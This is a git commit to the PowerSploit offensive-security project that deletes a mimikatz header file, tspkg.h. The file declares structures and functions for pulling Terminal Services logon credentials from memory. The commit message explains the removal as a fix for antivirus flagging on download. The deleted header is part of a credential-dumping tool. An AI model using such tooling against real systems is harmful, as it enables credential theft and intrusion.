Removed mimikatz.

This doesn't need to reside in PowerSploit. Those that are truly
paranoid should validate that the embedded executable in
Invoke-Mimikatz.ps1 is indeed mimikatz.

This was causing AV to flag upon downloading PowerSploit.

1 files changed, 0 insertions, 37 deletions

diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h
deleted file mode 100644
index 35a3b15..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h
+++ /dev/null
@@ -1,37 +0,0 @@
-/*	Benjamin DELPY `gentilkiwi`
-	http://blog.gentilkiwi.com
-	benjamin@gentilkiwi.com
-	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
-	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../mod_mimikatz_sekurlsa.h"
-
-class mod_mimikatz_sekurlsa_tspkg {
-
-private:
-	typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
-		PVOID unk0;	// lock ?
-		KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
-	} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;
-
-	typedef struct _KIWI_TS_CREDENTIAL {
-	#ifdef _M_X64
-		BYTE unk0[108];
-	#elif defined _M_IX86
-		BYTE unk0[64];
-	#endif
-		LUID LocallyUniqueIdentifier;
-		PVOID unk1;
-		PVOID unk2;
-		PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
-	} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
-
-	static PRTL_AVL_TABLE TSGlobalCredTable;
-	static bool searchTSPKGFuncs();
-
-public:
-	static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModTSPKG;
-	static bool getTsPkg(vector<wstring> * arguments);
-	static bool WINAPI getTsPkgLogonData(__in PLUID logId, __in bool justSecurity);
-};